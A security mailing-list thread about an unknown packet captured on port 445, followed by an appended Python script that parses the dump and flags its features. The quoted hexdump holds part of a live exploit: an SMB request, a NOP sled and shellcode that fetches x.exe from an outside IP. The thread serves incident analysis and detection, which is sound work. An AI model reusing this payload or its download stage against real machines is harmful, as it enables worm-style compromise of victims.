If you don't have access to the source machine, then maybe take a look here...
http://www.pestpatrol.com/pestinfo/t/trojandownloader_win32_delf.asp

...or maybe here...
http://www.pestpatrol.com/pestinfo/w/worm_p2p_surnova.asp

...without more info (rest of packet, openports output, etc)...

--- Sumeet SINGH <[EMAIL PROTECTED]> wrote:

> hi,
>
> We've been seeing a large number of copies of a TCP packet to port 445,
> that includes the following portion that we have not seen before:
>
> 00 00 0c f4 ff 53 4d 42 25 00 00 00 00 18 07 c8  .....SMB%.......
> 00 00 00 00 00 00 00 00 00 00 00 00 00 08 dc 04  ................
> 00 08 60 00 10 00 00 a0 0c 00 00 00 04 00 00 00  ..`.............
> 00 00 00 00 00 00 00 00 00 54 00 a0 0c 54 00 02  .........T...T..
> 00 26 00 00 40 b1 0c 10 5c 00 50 00 49 00 50 00  .&[EMAIL PROTECTED]
> 45 00 5c 00 00 00 00 00 05 00 00 03 10 00 00 00  E.\.............
> a0 0c 00 00 01 00 00 00 88 0c 00 00 00 00 09 00  ................
> ec 03 00 00 00 00 00 00 ec 03 00 00 90 90 90 90  ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
> 90 90 90 90 90 90 90 90 90 90 90 90 eb 58 68 74  .............Xht
> 74 70 3a 2f 2f 32 30 32 2e 31 2e 32 30 30 2e 31  tp://202.1.200.1
> 39 3a 32 34 34 36 2f 78 2e 65 78 65 df df df df  9:2446/x.exe....
> df df df df df df df df df 4d 6f 7a 69 6c 6c 61  .........Mozilla
> 2f 34 2e 30 df 5d 33 c9 66 b9 ee 01 8d 75 05 8b  /4.0.]3.f....u..
> fe 8a 06 3c 99 75 05 46 8a 06 2c 30 46 34 99 88  .....u.F..,0F4..
>
> (the remainder of the packet has been removed)
>
> Has anyone seen this before?
> The IP address (202.1.200.19) is unreachable.
>
> Is this an old exploit (worm/bot) that just took its time to come around
> to us?
>
> -- sumeet
> PhD. Student
> UCSD
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
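As an added example that is not part of this thread: a small Python triage script that parses the hexdump format quoted above and flags the features the post describes, an SMB request to port 445 carrying a long 0x90 sled and an embedded download URL. The dump excerpt embedded in the script is copied from the post; the 32-byte sled threshold is an assumed cut-off, not something the thread states.

```python
import re

# Excerpt of the packet hexdump quoted in the post (SMB header, end of the
# request, part of the NOP sled, embedded URL); 16 hex bytes then ASCII.
DUMP = """\
00 00 0c f4 ff 53 4d 42 25 00 00 00 00 18 07 c8  .....SMB%.......
00 00 00 00 00 00 00 00 00 00 00 00 00 08 dc 04  ................
ec 03 00 00 00 00 00 00 ec 03 00 00 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 eb 58 68 74  .............Xht
74 70 3a 2f 2f 32 30 32 2e 31 2e 32 30 30 2e 31  tp://202.1.200.1
39 3a 32 34 34 36 2f 78 2e 65 78 65 df df df df  9:2446/x.exe....
"""

def parse_hexdump(dump: str) -> bytes:
    """Decode the 16-bytes-per-line dump, dropping the ASCII column."""
    out = bytearray()
    for line in dump.splitlines():
        tokens = line.split()[:16]
        if tokens and all(re.fullmatch(r"[0-9a-fA-F]{2}", t) for t in tokens):
            out += bytes.fromhex("".join(tokens))
    return bytes(out)

def longest_nop_sled(data: bytes) -> int:
    """Length of the longest run of 0x90 (x86 NOP) bytes."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == 0x90 else 0
        best = max(best, cur)
    return best

def find_urls(data: bytes) -> list:
    """Printable http(s) URLs embedded in the payload (a download stage)."""
    return [m.decode("ascii") for m in re.findall(rb"https?://[\x21-\x7e]+", data)]

def triage(dump: str, sled_threshold: int = 32) -> dict:
    """Flag an SMB request that carries a NOP sled and a download URL."""
    data = parse_hexdump(dump)
    is_smb = data[4:8] == b"\xffSMB"   # 4-byte NetBIOS session header first
    sled = longest_nop_sled(data)
    urls = find_urls(data)
    return {
        "smb": is_smb,
        "smb_command": data[8] if len(data) > 8 else None,  # 0x25 = SMB_COM_TRANSACTION
        "nop_sled": sled,
        "urls": urls,
        "suspicious": is_smb and sled >= sled_threshold and bool(urls),  # assumed threshold
    }
```

Running `triage(DUMP)` on the excerpt reports the SMB transaction command, a 48-byte sled and the URL from the post; on a full capture the sled count would be correspondingly larger.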
